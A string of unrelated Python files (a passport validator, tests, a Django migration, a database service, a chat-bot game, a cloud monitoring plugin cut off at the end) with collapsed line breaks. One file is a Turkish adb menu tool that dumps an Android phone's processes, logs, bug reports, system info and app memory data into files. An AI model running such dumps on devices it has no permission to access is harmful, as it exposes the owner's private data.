import math def tokenizePassports(inputList): tempPassport = {} passports = [] for row in inputList: if len(row) > 0: items = row.split(" ") for item in items: item = item.split(":") tempPassport[item[0]] = item[1] else: passports.append(tempPassport) tempPassport = {} if len(tempPassport) > 0: passports.append(tempPassport) return passports def validateByr(value): try: value = int(value) except ValueError: return False if not (1920 <= value <= 2002): return False return True def validateIyr(value): try: value = int(value) except ValueError: return False if not (2010 <= value <= 2020): return False return True def validateEyr(value): try: value = int(value) except ValueError: return False if not (2020 <= value <= 2030): return False return True def validateHgt(value): height = value[:-2] unit = value[-2:] if unit not in ["in", "cm"]: return False try: height = int(height) except ValueError: return False if unit == "cm": if not (150 <= height <= 193): return False else: if not (59 <= height <= 76): return False return True def validateHcl(value): if value[0] != "#": return False if len(value) != 7: return False try: int(value[1:], 16) except ValueError: return False return True def validateEcl(value): if value not in ["amb","blu","brn","gry","grn","hzl","oth"]: return False return True def validatePid(value): if len(value) != 9: return False return True def validateField(key, value): switch = { "byr": validateByr, "iyr": validateIyr, "eyr": validateEyr, "hgt": validateHgt, "hcl": validateHcl, "ecl": validateEcl, "pid": validatePid, "cid": lambda value: True } return switch[key](value) def validatePassport(passport): for key in passport.keys(): if validateField(key, passport[key]): continue else: print("[X] passport has wrong field {}: {}".format(key, passport[key])) return False return True inputList = [] with open("./4/input.txt") as inputFile: for line in inputFile: line = line.replace("\n","") inputList.append(line) passports = tokenizePassports(inputList) validPassports = 0 necessaryKeys = {"byr","iyr","eyr","hgt","hcl","ecl","pid"} for passport in passports: passportKeys = set(passport.keys()) if necessaryKeys.issubset(passportKeys): if validatePassport(passport): print("[O] passport with {} is valid".format(passportKeys)) validPassports += 1 continue else: print("[X] passport missing {}, {}".format(necessaryKeys.difference(passportKeys), passport)) print("the number of valid passports is {}".format(validPassports))
import asyncio import logging import os import websockets from fenix_pipeline import ConnectionClosed from fenix_pipeline import RawDataSocket from fenix_pipeline import SubscriptionTypes from fenix_pipeline import Trade log = logging.getLogger(__name__) LOCAL_ONLY = os.environ.get('LOCAL_ONLY', 'true').lower() in ('t', 'true', '1') API_KEY = os.environ.get('FENIX_API_KEY') LOG_LEVEL = os.environ.get('LOG_LEVEL', 'debug') RUN_DURATION = int(os.environ.get('DURATION', 3)) SUBSCRIPTIONS = os.environ.get('SUBSCRIPTIONS', 'trades_by_market:btc-usdt') async def test_socket_lifecycle(event_loop): subscriptions = [_get_subscription_parts(s) for s in SUBSCRIPTIONS.split('/')] socket = RawDataSocket(API_KEY, event_loop=event_loop) if LOCAL_ONLY: socket.uri = 'ws://localhost:8765' message_emitter = None try: log.info('starting receiver') async with await socket.connect(print_messages) as subscriber: log.info('subscribing') for subscription in subscriptions: await subscriber.subscribe(*subscription) await subscriber.monitor(RUN_DURATION) log.info('unsubscribing') for subscription in subscriptions: await subscriber.unsubscribe(*subscription) except ConnectionClosed: log.info('socket closed, exiting lifecycle loop') finally: if message_emitter and not message_emitter.done(): log.info('awaiting message emit task') await asyncio.gather(message_emitter) def _get_subscription_parts(subscription): values = subscription.split(':') return SubscriptionTypes[values[0].upper()], values[1] if values[1] else None async def simple_sample(event_loop): # read the API key from a local environment variable called `FENIX_API_KEY` socket = RawDataSocket(os.environ.get('FENIX_API_KEY')) # using a context manager async with await socket.connect(message_handler=print_messages) as subscriber: # subscribe to the `btc-usdt` stream await subscriber.subscribe( SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt') # just receive messages for the next 10 seconds await subscriber.monitor(10) # unsubscribe from the `btc-usdt` stream await subscriber.unsubscribe( SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt') # done async def test_channel_to_all_state_transitions(event_loop): socket = RawDataSocket(API_KEY, event_loop=event_loop) if LOCAL_ONLY: socket.uri = 'ws://localhost:8765' async with await socket.connect(message_handler=print_messages) as subscriber: await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt') await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdu') await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdv') await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.ALL_TRADES, None) await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt') await asyncio.sleep(1) await subscriber.unsubscribe(SubscriptionTypes.ALL_TRADES, None) await asyncio.sleep(1) await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt') await asyncio.sleep(1) async def print_messages(item): if isinstance(item, Trade): log.info('received: %r', item) else: log.info('other message: %s', item) if __name__ == '__main__': logging.getLogger().addHandler(logging.StreamHandler()) log_level = getattr(logging, LOG_LEVEL.upper()) logging.getLogger('fenix').setLevel(log_level) log.setLevel(log_level) event_loop = asyncio.get_event_loop() event_loop.run_until_complete(test_socket_lifecycle(event_loop))
# Generated by Django 3.0.7 on 2020-06-18 05:56 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('problem', '0008_auto_20200618_1347'), ] operations = [ migrations.AlterModelOptions( name='problem', options={'permissions': (('edit', 'Can edit problem'), ('remove', 'Can delete problem'), ('view_hidden', 'Can view hidden problem'))}, ), ]
# Copyright 2017 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from datetime import datetime import json import mock from google.appengine.ext import ndb import webapp2 from gae_libs.testcase import TestCase from handlers import collect_tree_closures from model.tree_closure import TreeClosure from model.tree_closure import TreeStatus class CollectTreeClosuresTest(TestCase): app_module = webapp2.WSGIApplication( [ ('/collect-tree-closures', collect_tree_closures.CollectTreeClosures), ], debug=True) def testGetCurrentCheckingPointForTreeWithoutExistingData(self): self.MockUTCNow(datetime(2017, 04, 13, 10, 10, 10)) expected_checking_point = datetime(2017, 01, 13, 10, 10, 10) checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c') self.assertEqual(expected_checking_point, checking_point) def testGetCurrentCheckingPointForTreeWithExistingData(self): TreeClosure(tree_name='c', closed_time=datetime(2017, 04, 10, 10, 10)).put() TreeClosure( tree_name='c', closed_time=datetime(2017, 04, 11, 05, 05), opened_time=datetime(2017, 04, 11, 05, 15)).put() expected_checking_point = datetime(2017, 04, 11, 05, 15) checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c') self.assertEqual(expected_checking_point, checking_point) @mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get') def testRetrieveTreeStatusSuccess(self, mocked_Get): mocked_Get.side_effect = [(200, json.dumps([{ 'date': '2017-04-01 12:12:12', 'message': 'm1', 'general_state': 'open', 'username': 'test@chromium.org', }, { 'date': '2017-04-01 12:12:12', 'message': 'm1', 'general_state': 'open', 'username': 'test@chromium.org', }]), {})] statuses = collect_tree_closures._RetrieveTreeStatus( 'chromium', datetime(2017, 03, 31)) self.assertEqual(1, len(statuses)) self.assertEqual(statuses[0].time, datetime(2017, 04, 01, 12, 12, 12)) self.assertEqual(statuses[0].message, 'm1') self.assertEqual(statuses[0].state, 'open') self.assertEqual(statuses[0].username, 'test@chromium.org') mocked_Get.assert_called_once_with( 'https://chromium-status.appspot.com/allstatus', params={ 'limit': 1000, 'format': 'json', 'endTime': 1490918400, }) @mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get') def testRetrieveTreeStatusFailure(self, mocked_Get): mocked_Get.side_effect = [(400, 'error', {})] statuses = collect_tree_closures._RetrieveTreeStatus( 'chromium', datetime(2017, 03, 31), end_time=datetime(2017, 04, 01)) self.assertEqual(0, len(statuses)) mocked_Get.assert_called_once_with( 'https://chromium-status.appspot.com/allstatus', params={ 'limit': 1000, 'format': 'json', 'endTime': 1490918400, 'startTime': 1491004800, }) def testExtractFailureInfoWithFullBuildLink(self): message = ('Tree is closed (Automatic: "compile" on ' 'http://build.chromium.org/p/m/builders/b/builds/1 "b" from ...') info = collect_tree_closures._ExtractFailureInfo(message) self.assertEqual(('m', 'b', '1', 'compile'), info) def testExtractFailureInfoWithPartialBuildLink(self): message = ('Tree is closed (Automatic: "compile" on ' '/builders/b/builds/1 "b" from ...') info = collect_tree_closures._ExtractFailureInfo(message) self.assertEqual((None, 'b', '1', 'compile'), info) def testExtractFailureInfoWithUnknownMessageFormat(self): message = 'Tree is closed for blink rename' info = collect_tree_closures._ExtractFailureInfo(message) self.assertEqual((None, None, None, None), info) def testDetectTreeClosureForTreeWithOneCompleteClosure(self): all_statuses = [ TreeStatus(state='open'), # A complete closure. TreeStatus( time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400. message=('Tree is closed (Automatic: "compile" on ' '/builders/Win%20x64/builds/10327 "Win x64" from blabla'), state='closed', username='buildbot@chromium.org', ), TreeStatus( time=datetime(2017, 03, 31, 0, 1, 0), message='Tree is closed (sheriff investigating)', state='closed', username='test@chromium.org', ), TreeStatus( time=datetime(2017, 03, 31, 0, 5, 0), message='possible flake', state='open', username='test@chromium.org', ), TreeStatus( time=datetime(2017, 03, 31, 0, 15, 0), message='speculative Reverted r12345678', state='open', username='test@chromium.org', ), # An incomplete closure. TreeStatus(state='closed') ] num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses) self.assertEqual(1, num) key_str_id = '%s-%s' % ('c', 1490918400) closure = ndb.Key(TreeClosure, key_str_id).get() self.assertIsNotNone(closure) self.assertEqual('c', closure.tree_name) self.assertEqual(all_statuses[1:-1], closure.statuses) self.assertEqual(datetime(2017, 03, 31, 0, 0, 0), closure.closed_time) self.assertEqual(datetime(2017, 03, 31, 0, 5, 0), closure.opened_time) self.assertEqual( datetime(2017, 03, 31, 0, 15, 0), closure.latest_action_time) self.assertTrue(closure.auto_closed) self.assertFalse(closure.auto_opened) self.assertTrue(closure.possible_flake) self.assertTrue(closure.has_revert) self.assertIsNone(closure.master_name) self.assertEqual('Win x64', closure.builder_name) self.assertEqual('10327', closure.build_id) self.assertEqual('compile', closure.step_name) def testDetectTreeClosureForTreeWithIncompleteClosure(self): all_statuses = [ # A incomplete closure. TreeStatus( time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400. message=('Tree is closed (Automatic: "compile" on ' '/builders/Win%20x64/builds/10327 "Win x64" from blabla'), state='closed', username='buildbot@chromium.org', ), TreeStatus( time=datetime(2017, 03, 31, 0, 15, 0), message='possible flake', state='open', username='test@chromium.org', ), ] num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses) self.assertEqual(0, num) key_str_id = '%s-%s' % ('c', 1490918400) closure = ndb.Key(TreeClosure, key_str_id).get() self.assertIsNone(closure) @mock.patch.object( collect_tree_closures, '_GetCurrentCheckingPointForTree', return_value=datetime(2017, 03, 01)) @mock.patch.object( collect_tree_closures, '_RetrieveTreeStatus', return_value=['a']) @mock.patch.object( collect_tree_closures, '_DetectTreeClosureForTree', return_value=2) def testGetWithStartTimeAndEndTime(self, mocked_detect_fun, mocked_retrive_fun, mocked_check_fun): response = self.test_app.get( '/collect-tree-closures', params={'start_time': '2017-04-01', 'end_time': '2017-04-05'}, headers={ 'X-AppEngine-Cron': 'true' }) self.assertEquals(200, response.status_int) expected_result = {'chromium': 2} self.assertEqual(expected_result, response.json_body) self.assertFalse(mocked_check_fun.called) mocked_retrive_fun.assert_called_once_with( 'chromium', datetime(2017, 04, 01), end_time=datetime(2017, 04, 05)) mocked_detect_fun.assert_called_once_with('chromium', ['a']) @mock.patch.object( collect_tree_closures, '_GetCurrentCheckingPointForTree', return_value=datetime(2017, 04, 01)) @mock.patch.object( collect_tree_closures, '_RetrieveTreeStatus', return_value=['a']) @mock.patch.object( collect_tree_closures, '_DetectTreeClosureForTree', return_value=2) def testGetWithoutStartTime(self, mocked_detect_fun, mocked_retrive_fun, mocked_check_fun): response = self.test_app.get( '/collect-tree-closures', headers={ 'X-AppEngine-Cron': 'true' }) self.assertEquals(200, response.status_int) expected_result = {'chromium': 2} self.assertEqual(expected_result, response.json_body) mocked_check_fun.assert_called_once_with('chromium') mocked_retrive_fun.assert_called_once_with( 'chromium', datetime(2017, 04, 01), end_time=None) mocked_detect_fun.assert_called_once_with('chromium', ['a'])
from time import time b = 5 c = 3 d = 2 initime = time() for x in range(100000): b = (c + d)%100 c= (b + d)%1000 d= (c + b + d)%500 b= (d - c)%150 fintime = time() print("TIME: " + str(fintime - initime))
from typing import List from sqlalchemy.exc import InvalidRequestError, OperationalError from sqlalchemy.orm import sessionmaker, Session from DTO.run_type_dto import RunTypeDto, create_run_type from config.base import getSession from utils.checkers import Checkers try: from entities.lst_run_type import LstRunType except ImportError as error: Checkers.print_exception_one_param(error) class LstRunTypeService: def __init__(self): self.__session: Session = getSession() self.__all_run_type = None self.__run_type_by_id = None def insert_run_type(self, run_type_insert: RunTypeDto): try: run_type_aux = LstRunType( description_run_type=run_type_insert.description_run_type ) self.__session.add(run_type_aux) self.__session.commit() if run_type_aux.id_run_type is not None: print("RECORD INSERTED IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name, run_type_aux.id_run_type)) else: print(" THE RECORD OF TABLE '{}' HAS NOT BEEN INSERTED".format(LstRunType.__tablename__.name)) except (InvalidRequestError, NameError) as error_request: Checkers.print_exception_one_param(error_request) except OperationalError as error_request2: Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0]) def update_run_type(self, id_run_type, description_run_type=None): try: run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type) if Checkers.validate_int(id_run_type, LstRunType.id_run_type.name) and run_type_before.id_run_type is not None: self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \ .update({ LstRunType.description_run_type: Checkers.check_field_not_null(LstRunType.description_run_type, description_run_type) }, synchronize_session=False ) self.__session.commit() run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type) if run_type_before.__dict__ != run_type_after.__dict__: print(" RECORD UPDATED IN TABLE '{}' WITH ID '{}' ".format(LstRunType.__tablename__.name, id_run_type)) else: print(" THE RECORD OF TABLE '{}' HAS NOT BEEN UPDATED".format(LstRunType.__tablename__.name)) else: print(" THE RECORD OF TABLE '{}' COULD NOT BE UPDATED ".format(LstRunType.__tablename__.name)) except (InvalidRequestError, NameError) as error_request: Checkers.print_exception_one_param(error_request) except OperationalError as error_request2: Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0]) def delete_run_type(self, id_run_type): try: run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type) if Checkers.validate_int(id_run_type, LstRunType.id_run_type.name) and run_type_before.id_run_type is not None: self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \ .delete(synchronize_session=False) self.__session.commit() run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type) if run_type_before.id_run_type is not None and run_type_after.id_run_type is None: print("RECORD DELETE IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name, id_run_type)) else: print(" THE RECORD OF TABLE '{}' WITH ID '{}' HAS NOT BEEN DELETED BECAUSE IT DID NOT EXIST".format( LstRunType.__tablename__.name, id_run_type)) else: print(" THE RECORD OF TABLE '{}' COULD NOT BE DELETED".format(LstRunType.__tablename__.name)) except (InvalidRequestError, NameError) as error_request: Checkers.print_exception_one_param(error_request) except OperationalError as error_request2: Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0]) def get_all_run_type(self): run_type_dto_list = [] try: self.__all_run_type: List[RunTypeDto] = self.__session.query(LstRunType).all() if len(self.__all_run_type) != 0: for row in self.__all_run_type: run_type_aux = create_run_type( row.id_run_type, row.description_run_type ) run_type_dto_list.append(run_type_aux) else: Checkers.empty_list(LstRunType.__tablename__.name) except (InvalidRequestError, NameError) as error_request: Checkers.print_exception_one_param(error_request) except OperationalError as error_request2: Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0]) return run_type_dto_list def get_run_type_by_id(self, id_run_type): try: self.__run_type_by_id: RunTypeDto = self.__session.query(LstRunType).filter( LstRunType.id_run_type.like(id_run_type)).first() if self.__run_type_by_id is not None: return create_run_type( self.__run_type_by_id.id_run_type, self.__run_type_by_id.description_run_type ) else: Checkers.print_object_filter_null(LstRunType.id_run_type.name, str(id_run_type)) return create_run_type(None, None) except (InvalidRequestError, NameError) as error_request: Checkers.print_exception_one_param(error_request) except OperationalError as error_request2: Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0]) return create_run_type(None, None)
print(""" ######### ######## # # ######## ############ # # # # # # # # # # # # # # # # # # ######### ######## # # ######## ############ # # # # # # # # # # # # # # # # # # ######### ######## # # # # # # \n Made by @EBSSecurty """) print("www.ebubekirbastama.com"+"\n") import subprocess komutumprocess = 'adb.exe shell ps' komutumls = 'adb.exe shell ls -all' komutumnetstat = 'adb.exe shell netstat' devicessinfoversion = 'adb.exe shell getprop' log = 'adb.exe logcat -d > telefonlogları.txt' bugreport='adb.exe bugreport > telefonBuglogları.txt' sysdump='adb.exe shell dumpsys > telefonBütün_Bilgileri.txt' packetdump='adb.exe shell dumpsys activity > Paketisimleri.txt' memdump='adb.exe shell dumpsys meminfo > meminfo.txt' memdumpdetayli='adb.exe shell dumpsys meminfo' print("1-) Process Listeleme"+"\n"+"2-) Klasör ve Ayrıntıları Listeleme"+"\n"+"3-) Netstat Çalıştırma"+"\n"+"4-) Telefon Detaylı Versiyon Bilgileri"+"\n"+"5-) Telefon Logları Çıktı Al" +"\n"+"6-) Telefon Bug Report Çıktı Al"+"\n"+"7-) Bütün Telefon Sistem Bilgileri(Wifi,batarya vb.)"+"\n"+"8-) Telefondaki Bütün Apk Paket İsimleri." +"\n"+"9-) Telefon Memori Packet Bilgileri"+"\n"+"10-) Packet İsmine Göre Memoriden Bilgi Getir." ) numara=input("Neyapmak İstersin..."+"?\n") if numara == "1": piey = subprocess.Popen(komutumprocess, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print(gelenveri) elif numara == "2": piey = subprocess.Popen(komutumls, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print(gelenveri) elif numara == "3": piey = subprocess.Popen(komutumnetstat, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print(gelenveri) elif numara == "4": piey = subprocess.Popen(devicessinfoversion, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print(gelenveri) elif numara == "5": piey = subprocess.Popen(log, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Loglar Başarılı Bir Şekilde Aktarıldı.") elif numara == "6": print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...") piey = subprocess.Popen(bugreport, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Loglar Başarılı Bir Şekilde Aktarıldı.") elif numara == "7": print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...") piey = subprocess.Popen(sysdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Sistem Bilgileri Başarılı Bir Şekilde Aktarıldı.") elif numara == "8": print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...") piey = subprocess.Popen(packetdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Packed Bilgileri Başarılı Bir Şekilde Aktarıldı.") elif numara == "9": print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...") piey = subprocess.Popen(memdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Memori Bilgileri Başarılı Bir Şekilde Aktarıldı.") elif numara == "10": packet_ismi = input("Lütfen Packet İsmini Yazınız Örnk(com.whatsapp)" + "?\n") dtyy=memdumpdetayli+" "+packet_ismi+" > memdetayliinfo.txt" piey = subprocess.Popen(dtyy, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = piey.communicate() gelenveri = piey.communicate() print("Memori Bilgileri Başarılı Bir Şekilde Aktarıldı.")
"""Collection of code generation utils.""" import os import shutil from pathlib import Path from typing import Union from black import WriteBack, format_file_in_place from black.mode import Mode from git import RemoteProgress, Repo from mypy.stubgen import generate_stubs, parse_options PROJECT_DIRECTORY = Path(__file__).parent.parent def format_codegen(dst_dir: Union[str, Path], line_length: int = 180) -> None: """Format target files using black.""" mode = Mode( line_length=line_length, ) if isinstance(dst_dir, Path): dst_dir = dst_dir.absolute().as_posix() for dirpath, _, filenames in os.walk(dst_dir): for fn in filenames: format_file_in_place(Path(dirpath, fn), True, mode, WriteBack.YES) def comment_codegen(dst_dir: Union[str, Path], name: str) -> None: """Prepend codegen comment to al files in a directory.""" if isinstance(dst_dir, Path): dst_dir = dst_dir.absolute().as_posix() for dirpath, _, filenames in os.walk(dst_dir): for fn in filenames: with open(os.path.join(dirpath, fn), "r") as original: file_content = original.read() with open(os.path.join(dirpath, fn), "w") as modified: modified.write("# Code generated by `{0}`. DO NOT EDIT.\n".format(name) + file_content) def clone_and_generate(clone_dir: Path, package_dir: Path, dst_dir: Path, branch: str) -> None: """Clone source repo and generate stubs for package. :param Path clone_dir: Where to clone source repo :param Path package_dir: Path to module that needs stubs generated :param Path dst_dir: Destination path for stubs :param str branch: Which branch to clone """ if clone_dir.exists(): shutil.rmtree(clone_dir) clone_dir.mkdir(exist_ok=True, parents=False) repo = Repo.clone_from( "https://github.com/kubernetes-client/python.git", clone_dir, progress=RemoteProgress(), branch=branch, depth=1, ) for submodule in repo.submodules: submodule.update(init=True) stubgen_options = parse_options( [ "{0}".format(package_dir), "-o={0}".format(dst_dir), ], ) generate_stubs(stubgen_options) comment_codegen(dst_dir, "stubgen")
""" メッシュコード処理モジュール """ from math import floor from typing import Tuple def get_meshcode(lat: float, lon: float) -> str: """経度・緯度からメッシュコード(1 次、2 次、3 次)を取得 Args: lat(float): 緯度(10 進数) lon(float): 経度(10 進数) Returns: str: 1 次メッシュコード(4 桁), 2 次メッシュコード(2 桁), 3 次メッシュコード(2 桁) 計8桁 """ lt = lat * 3.0 / 2.0 lg = lon y1 = floor(lt) x1 = floor(lg) lt = (lt - y1) * 8.0 lg = (lg - x1) * 8.0 y2 = floor(lt) x2 = floor(lg) lt = (lt - y2) * 10.0 lg = (lg - x2) * 10.0 y3 = floor(lt) x3 = floor(lg) code1 = 0 code1 += int(y1) % 100 * 100 code1 += int(x1) % 100 * 1 code2 = 0 code2 += int(y2) * 10 code2 += int(x2) * 1 code3 = 0 code3 += int(y3) * 10 code3 += int(x3) * 1 return str(code1 * 10000 + code2 * 100 + code3) def get_mesh_latlon(meshcode: str) -> Tuple[float, float]: """メッシュコードから経度緯度への変換 Args: meshcode(str): メッシュコード Returns: Tuple[float, float]: 緯度(10 進数), 経度(10 進数) """ # メッシュコードから緯度経度を計算(中心ではなく南西方向の座標が得られる) y1 = int(meshcode[:2]) x1 = int(meshcode[2:4]) y2 = int(meshcode[4]) x2 = int(meshcode[5]) y3 = int(meshcode[6]) x3 = int(meshcode[7]) # 南西方向の座標からメッシュ中心の緯度を算出 lat = ((y1 * 80 + y2 * 10 + y3) * 30 / 3600) + 15 / 3600 # 南西方向の座標からメッシュ中心の経度を算出 lon = (((x1 * 80 + x2 * 10 + x3) * 45 / 3600) + 100) + 22.5 / 3600 return lat, lon
from matrix_bot.mbot.plugins import Plugin, civility import random class GuessNumberPlugin(Plugin): """Play a guess the number game. You have to guess what the number is in a certain number of attempts. You will be told information such as higher/lower than the guessed number. guessnumber new : Starts a new game. guessnumber hint : Get a hint for the number. Consumes an attempt. guessnumber guess <number> : Guess the number. Consumes an attempt. """ name = "guessnumber" MAX_NUM = 100 ATTEMPTS = 5 def __init__(self, *args, **kwargs): super(Plugin, self).__init__(*args, **kwargs) self.games = {} @civility def cmd_new(self, event): """Start a new game. 'guessnumber new'""" usr = event["sender"] game_state = { "num": random.randint(0, GuessNumberPlugin.MAX_NUM), "attempts": 0 } self.games[usr] = game_state return ( self.tr.trans( "Created a new game." "Guess what the chosen number is between 0-%s. You have %s attempts." ) % (GuessNumberPlugin.MAX_NUM, GuessNumberPlugin.ATTEMPTS) ) @civility def cmd_guess(self, event, num): """Make a guess. 'guessnumber guess <number>'""" usr = event["sender"] if usr not in self.games: return self.tr.trans("You need to start a game first.") int_num = -1 try: int_num = int(num) except: return self.tr.trans("That isn't a number.") target_num = self.games[usr]["num"] if int_num == target_num: self.games.pop(usr) return self.tr.trans("You win!") game_over = self._add_attempt(usr) if game_over: return game_over else: sign = self.tr.trans("greater") \ if (target_num > int_num) else self.tr.trans("less") return self.tr.trans("Nope. The number is %s than that.") % sign @civility def cmd_hint(self, event): """Get a hint. 'guessnumber hint'""" # hints give a 50% reduction, e.g. between 0-50, even/odd, ends with 12345 usr = event["sender"] if usr not in self.games: return self.tr.trans("You need to start a game first.") num = self.games[usr]["num"] hint_pool = [self._odd_even, self._ends_with, self._between] hint_func = hint_pool[random.randint(1, len(hint_pool)) - 1] game_over = self._add_attempt(usr) if game_over: return game_over return hint_func(num) def _add_attempt(self, usr): self.games[usr]["attempts"] += 1 if self.games[usr]["attempts"] >= GuessNumberPlugin.ATTEMPTS: res = self.tr.trans( "Out of tries. The number was %s." ) % self.games[usr]["num"] self.games.pop(usr) return res def _between(self, num): half = GuessNumberPlugin.MAX_NUM / 2 if num < half: return "The number is less than %s." % half else: return "The number is %s or greater." % half def _ends_with(self, num): actual = num % 10 if actual < 5: return self.tr.trans("The last digit is either 0, 1, 2, 3, 4.") else: return self.tr.trans("The last digit is either 5, 6, 7, 8, 9.") def _odd_even(self, num): if num % 2 == 0: return self.tr.trans("The number is even.") else: return self.tr.trans("The number is odd.")
import datetime import glob import json import logging import os import re from ruxit.api.base_plugin import RemoteBasePlugin from googleapiclient.discovery import build from google.oauth2 import service_account COMPUTE_METRICS = [ 'compute.googleapis.com/instance/cpu/utilization', 'compute.googleapis.com/instance/disk/read_bytes_count', 'compute.googleapis.com/instance/disk/read_ops_count', 'compute.googleapis.com/instance/disk/write_bytes_count', 'compute.googleapis.com/instance/disk/write_ops_count', 'compute.googleapis.com/instance/network/received_bytes_count', 'compute.googleapis.com/instance/network/received_packets_count', 'compute.googleapis.com/instance/network/sent_bytes_count', 'compute.googleapis.com/instance/network/sent_packets_count', 'compute.googleapis.com/instance/uptime' ] #class RemoteGCPPlugin(): class RemoteGCPPlugin(RemoteBasePlugin): logger = logging.getLogger(__name__) def initialize(self, **kwargs): self.debug = False self.project_jwt = kwargs['config']['project_jwt'] # json.loads encapsulates keys and value in ' - the google library needs it encapsulated in " self.project_jwt = str(self.project_jwt).replace('{\'', '{"') self.project_jwt = str(self.project_jwt).replace('\': \'', '": "') self.project_jwt = str(self.project_jwt).replace('\', \'', '", "') self.project_jwt = str(self.project_jwt).replace('\'}', '"}') if 'debug' in kwargs: self.debug = True return def log(self, message): if self.debug: print(message) else: self.logger.info(__name__ + ": " + message) @staticmethod def format_rfc3339(datetime_instance): return datetime_instance.isoformat("T") + "Z" def get_start_time(self): start_time = (datetime.datetime.utcnow() - datetime.timedelta(minutes=5)) return self.format_rfc3339(start_time) def get_end_time(self): end_time = datetime.datetime.utcnow() - datetime.timedelta(minutes=0) return self.format_rfc3339(end_time) def build_requests(self, client, project_id): requests = [] project_resource = "projects/{}".format(project_id) for metric in COMPUTE_METRICS: request = client.projects().timeSeries().list( name=project_resource, filter='metric.type="{}"'.format(metric), interval_startTime=self.get_start_time(), interval_endTime=self.get_end_time()) requests.append(request) return requests @staticmethod def execute_requests(requests): responses = [] for request in requests: response = request.execute() responses.append(response) return responses @staticmethod def get_or_create_instance(instances, instance_name): for instance in instances: if instance['instance_name'] == instance_name: return instance instance = {'instance_name': instance_name} instances.append(instance) return instance def process_response(self, instances, response): # check if there was a data point in the given time frame if 'timeSeries' in response: for time_series in response['timeSeries']: instance_name = time_series['metric']['labels']['instance_name'] instance = self.get_or_create_instance(instances, instance_name) instance['instance_id'] = time_series['resource']['labels']['instance_id'] instance['zone'] = time_series['resource']['labels']['zone'] if not 'metrics' in instance: instance['metrics'] = {} # replace '/' with '-' because the remote plugin doesn't allow metrics with '/' in the name metric_name = str(time_series['metric']['type']).replace('/', '-') metric_value_type = str(time_series['valueType']).lower() + "Value" # TODO: instead of taking first value, calculate avg of returned metric points (sliding average) # TODO: review statistical background and recommendation metric_value = time_series['points'][0]['value'][metric_value_type] metric_timestamp = time_series['points'][0]['interval']['endTime'] instance['metrics'][metric_name] = {} instance['metrics'][metric_name]['valueType'] = metric_value_type instance['metrics'][metric_name]['value'] = metric_value instance['metrics'][metric_name]['timestamp'] = metric_timestamp def get_instances(self, project_jwt): instances = [] project_id = project_jwt["project_id"] self.log("Processing '{}'".format(project_id)) #credentials = service_account.Credentials.from_service_account_file(project_jwt) credentials = service_account.Credentials.from_service_account_info(project_jwt) client = build('monitoring', 'v3', credentials=credentials) requests = self.build_requests(client, project_id) responses = self.execute_requests(requests) for response in responses: self.process_response(instances, response) return instances def get_instance_details(self, list_of_instances, project_jwt): self.log("Getting instance details") credentials = service_account.Credentials.from_service_account_info(project_jwt) compute = build('compute', 'v1', credentials=credentials) project_id = project_jwt["project_id"] for instance in list_of_instances: zone = instance['zone'] instance_name = instance['instance_name'] request = compute.instances().get(project=project_id, zone=zone, instance=instance_name) instance_details = request.execute() instance['properties'] = {} instance['properties']['creation_timestamp'] = instance_details['creationTimestamp'] instance['properties']['description'] = instance_details['description'] 